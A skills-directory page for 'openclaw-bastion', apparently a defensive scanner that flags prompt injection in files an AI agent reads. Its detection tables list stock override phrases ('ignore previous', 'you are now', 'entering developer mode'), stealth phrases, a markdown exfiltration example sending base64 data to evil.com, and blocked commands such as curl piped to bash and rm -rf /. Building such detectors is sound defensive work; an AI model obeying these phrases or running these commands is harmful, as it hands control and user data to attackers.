skills$openclaw/openclaw-bastion
atlaspa8.2k

by atlaspa

openclaw-bastion – OpenClaw Skill

openclaw-bastion is an OpenClaw Skills integration for coding workflows. Prompt injection defense for agent workspaces. Scan files for injection attempts, analyze content boundaries, detect hidden instructions, and maintain command allowlists. Free alert layer — upgrade to openclaw-bastion-pro for active blocking, sanitization, and runtime enforcement.

8.2k stars8.7k forksSecurity L1
Updated Feb 7, 2026Created Feb 7, 2026coding

Skill Snapshot

nameopenclaw-bastion
descriptionPrompt injection defense for agent workspaces. Scan files for injection attempts, analyze content boundaries, detect hidden instructions, and maintain command allowlists. Free alert layer — upgrade to openclaw-bastion-pro for active blocking, sanitization, and runtime enforcement. OpenClaw Skills integration.
owneratlaspa
repositoryatlaspa/openclaw-bastion
languageMarkdown
licenseMIT
topics
securityL1
installopenclaw add @atlaspa/openclaw-bastion
last updatedFeb 7, 2026

Maintainer

atlaspa

atlaspa

Maintains openclaw-bastion in the OpenClaw Skills directory.

View GitHub profile
File Explorer
5 files
.
scripts
bastion.py
36.7 KB
_meta.json
285 B
README.md
4.8 KB
SKILL.md
5.0 KB
SKILL.md

name: openclaw-bastion description: "Prompt injection defense for agent workspaces. Scan files for injection attempts, analyze content boundaries, detect hidden instructions, and maintain command allowlists. Free alert layer — upgrade to openclaw-bastion-pro for active blocking, sanitization, and runtime enforcement." user-invocable: true metadata: {"openclaw":{"emoji":"\ud83c\udfdb\ufe0f","requires":{"bins":["python3"]},"os":["darwin","linux","win32"]}}

OpenClaw Bastion

Runtime prompt injection defense for agent workspaces. While other tools watch workspace identity files, Bastion protects the input/output boundary — the files being read by the agent, web content, API responses, and user-supplied documents.

Why This Matters

Agents process content from many sources: local files, API responses, web pages, user uploads. Any of these can contain prompt injection attacks — hidden instructions that manipulate agent behavior. Bastion scans this content before the agent acts on it.

Need active blocking? Upgrade to openclaw-bastion-pro for runtime content sanitization, auto-quarantine, canary testing, and policy enforcement via hooks.

Commands

Scan for Injections

Scan files or directories for prompt injection patterns. Detects instruction overrides, system prompt markers, hidden Unicode, markdown exfiltration, HTML injection, shell injection, encoded payloads, delimiter confusion, multi-turn manipulation, and dangerous commands.

If no target is specified, scans the entire workspace.

python3 {baseDir}/scripts/bastion.py scan

Scan a specific file or directory:

python3 {baseDir}/scripts/bastion.py scan path/to/file.md
python3 {baseDir}/scripts/bastion.py scan path/to/directory/

Quick File Check

Fast single-file injection check. Same detection patterns as scan, targeted to one file.

python3 {baseDir}/scripts/bastion.py check path/to/file.md

Boundary Analysis

Analyze content boundary safety across the workspace. Identifies:

  • Agent instruction files that contain mixed trusted/untrusted content
  • Writable instruction files (attack surface for compromised skills)
  • Blast radius assessment for each critical file
python3 {baseDir}/scripts/bastion.py boundaries

Command Allowlist

Display the current command allowlist and blocklist policy. Creates a default .bastion-policy.json if none exists.

python3 {baseDir}/scripts/bastion.py allowlist
python3 {baseDir}/scripts/bastion.py allowlist --show

The policy file defines which commands are considered safe and which patterns are blocked. Edit the JSON file directly to customize. Bastion Pro enforces this policy at runtime via hooks.

Status

Quick summary of workspace injection defense posture: files scanned, findings by severity, boundary safety, and overall posture rating.

python3 {baseDir}/scripts/bastion.py status

Workspace Auto-Detection

If --workspace is omitted, the script tries:

  1. OPENCLAW_WORKSPACE environment variable
  2. Current directory (if AGENTS.md exists)
  3. ~/.openclaw/workspace (default)

What Gets Detected

CategoryPatternsSeverity
Instruction override"ignore previous", "disregard above", "you are now", "new system prompt", "forget your instructions", "override safety", "act as if no restrictions", "entering developer mode"CRITICAL
System prompt markers<system>, [SYSTEM], <<SYS>>, <|im_start|>system, [INST], ### System:CRITICAL
Hidden instructionsMulti-turn manipulation ("in your next response, you must"), stealth patterns ("do not tell the user")CRITICAL
HTML injection<script>, <iframe>, <img onerror=>, hidden divs, <svg onload=>CRITICAL
Markdown exfiltrationImage tags with encoded data in URLsCRITICAL
Dangerous commandscurl | bash, wget | sh, rm -rf /, fork bombsCRITICAL
Unicode tricksZero-width characters, RTL overrides, invisible formattingWARNING
Homoglyph substitutionCyrillic/Latin lookalikes mixed into ASCII textWARNING
Base64 payloadsLarge encoded blobs outside code blocksWARNING
Shell injection$(command) subshell execution outside code blocksWARNING
Delimiter confusionFake code block boundaries with injection contentWARNING

Context-Aware Scanning

  • Patterns inside fenced code blocks (```) are skipped to avoid false positives
  • Per-file risk scoring based on finding count and severity
  • Self-exclusion: Bastion skips its own skill files (which describe injection patterns)

Exit Codes

CodeMeaning
0Clean, no issues
1Warnings detected (review recommended)
2Critical findings (action needed)

No External Dependencies

Python standard library only. No pip install. No network calls. Everything runs locally.

Cross-Platform

Works with OpenClaw, Claude Code, Cursor, and any tool using the Agent Skills specification.

README.md

OpenClaw Bastion

Free prompt injection defense for OpenClaw, Claude Code, and any Agent Skills-compatible tool.

Scans runtime content for injection attempts, analyzes content boundaries, detects hidden instructions, and maintains command allowlists — the input/output boundary defense that other tools miss.

Looking for active blocking and sanitization? See openclaw-bastion-pro for runtime content sanitization, auto-quarantine, canary testing, and policy enforcement via hooks.

How Bastion Differs from Warden

ToolDomainWhat It Watches
openclaw-wardenWorkspace identity integritySOUL.md, AGENTS.md, IDENTITY.md, memory files — the files that define agent behavior
openclaw-bastionRuntime content boundariesFiles being read by the agent, web content, API responses, user-supplied documents — everything the agent ingests

Warden watches the identity layer. Bastion watches the content layer. Use both for defense in depth.

Install

# Clone
git clone https://github.com/AtlasPA/openclaw-bastion.git

# Copy to your workspace skills directory
cp -r openclaw-bastion ~/.openclaw/workspace/skills/

Usage

# Scan entire workspace for injection patterns
python3 scripts/bastion.py scan

# Scan a specific file or directory
python3 scripts/bastion.py scan path/to/file.md
python3 scripts/bastion.py scan docs/

# Quick single-file check
python3 scripts/bastion.py check report.md

# Analyze content boundaries
python3 scripts/bastion.py boundaries

# View command allowlist/blocklist
python3 scripts/bastion.py allowlist

# Quick posture summary
python3 scripts/bastion.py status

All commands accept --workspace /path/to/workspace. If omitted, auto-detects from $OPENCLAW_WORKSPACE, current directory, or ~/.openclaw/workspace.

What It Detects

Injection Patterns

  • Instruction override — "ignore previous instructions", "disregard above", "you are now", "new system prompt", "forget your instructions", "override safety", "entering developer mode"
  • System prompt markers<system>, [SYSTEM], <<SYS>>, <|im_start|>system, [INST], ### System:
  • Hidden instructions — Multi-turn manipulation ("in your next response, you must..."), stealth patterns ("do not tell the user", "hide this from the output")
  • Markdown exfiltration — Image tags with encoded data in URLs (![](http://evil.com?data=BASE64))
  • HTML injection<script>, <iframe>, <img onerror=>, <svg onload=>, hidden divs
  • Shell injection$(command) subshell execution outside code blocks
  • Encoded payloads — Large base64 blobs outside code blocks
  • Unicode tricks — Zero-width characters, RTL overrides, invisible formatting
  • Homoglyph substitution — Cyrillic/Latin lookalikes mixed into ASCII text
  • Delimiter confusion — Fake markdown code block boundaries to escape context
  • Dangerous commandscurl | bash, wget | sh, rm -rf /, fork bombs

Boundary Analysis

  • Agent instruction files containing mixed trusted/untrusted content
  • Writable instruction files (attack surface for compromised skills)
  • Blast radius assessment for each critical file

Smart Detection

  • Respects markdown fenced code blocks (no false positives on documented examples)
  • Per-file risk scoring (CLEAN / INFO / LOW / MEDIUM / HIGH / CRITICAL)
  • Skips its own skill files (which describe injection patterns)
  • Context-aware: only flags patterns in active content, not examples

Command Policy

Bastion maintains a .bastion-policy.json in the workspace root with:

  • Allowlist: Standard safe commands (git, python, node, npm, etc.)
  • Blocklist: Dangerous patterns (curl pipe to shell, rm -rf /, fork bombs, etc.)

Run allowlist to create the default policy and view it. Edit the JSON file directly to customize.

Exit Codes

CodeMeaning
0Clean
1Warnings detected
2Critical findings

Free vs Pro

FeatureFreePro
Injection pattern scanningYesYes
Boundary analysisYesYes
Command allowlist displayYesYes
Per-file risk scoringYesYes
Context-aware detectionYesYes
Active content sanitization-Yes
Runtime blocking via hooks-Yes
Auto-quarantine injected files-Yes
Canary token testing-Yes
Policy enforcement (PreToolUse)-Yes
Sanitize-on-read pipeline-Yes
Alerting and audit log-Yes

Requirements

  • Python 3.8+
  • No external dependencies (stdlib only)
  • Cross-platform: Windows, macOS, Linux

License

MIT

Permissions & Security

Security level L1: Low-risk skills with minimal permissions. Review inputs and outputs before running in production.

Requirements

  • OpenClaw CLI installed and configured.
  • Language: Markdown
  • License: MIT
  • Topics:

FAQ

How do I install openclaw-bastion?

Run openclaw add @atlaspa/openclaw-bastion in your terminal. This installs openclaw-bastion into your OpenClaw Skills catalog.

Does this skill run locally or in the cloud?

OpenClaw Skills execute locally by default. Review the SKILL.md and permissions before running any skill.

Where can I verify the source code?

The source repository is available at https://github.com/openclaw/skills/tree/main/skills/atlaspa/openclaw-bastion. Review commits and README documentation before installing.